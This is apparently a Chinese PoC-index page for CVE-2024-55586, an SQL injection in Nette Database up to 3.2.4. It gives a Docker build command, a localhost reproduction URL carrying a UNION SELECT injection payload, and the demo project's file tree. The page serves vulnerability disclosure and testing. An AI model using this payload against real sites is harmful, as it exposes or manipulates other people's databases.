POC详情: 443e2ad1368fad64a662163422345a2fa919dfac

来源
关联漏洞
标题: Nette Database 安全漏洞 (CVE-2024-55586)
描述:Nette Database是Nette开源的一个具有熟悉的 PDO 类 API 但功能更强大的数据库层。 Nette Database 3.2.4及之前版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,导致攻击者可以通过构造恶意的SQL语句来操纵数据库的查询逻辑。
介绍
Build
-----

```docker compose up -d```


Reproduce
---------
In browser go to 

```http://localhost:8000/?id%3d1)+UNION+SELECT+2,version()+FROM+test+WHERE+(1=1```
文件快照

[4.0K] /data/pocs/443e2ad1368fad64a662163422345a2fa919dfac ├── [4.0K] demo │   ├── [ 529] Dockerfile │   └── [4.0K] src │   ├── [4.0K] app │   │   ├── [ 655] Bootstrap.php │   │   ├── [4.0K] Core │   │   │   └── [ 349] RouterFactory.php │   │   ├── [4.0K] Model │   │   │   └── [ 625] TestFacade.php │   │   └── [4.0K] UI │   │   ├── [ 486] @layout.latte │   │   └── [4.0K] Test │   │   ├── [ 761] all.latte │   │   └── [ 611] TestPresenter.php │   ├── [ 832] composer.json │   ├── [ 53K] composer.lock │   ├── [4.0K] config │   │   ├── [ 202] common.neon │   │   └── [ 146] services.neon │   ├── [ 269] index.php │   └── [1.6K] readme.md ├── [ 704] docker-compose.yml ├── [4.0K] postgres │   └── [ 115] init.sql └── [ 175] README.md 9 directories, 16 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。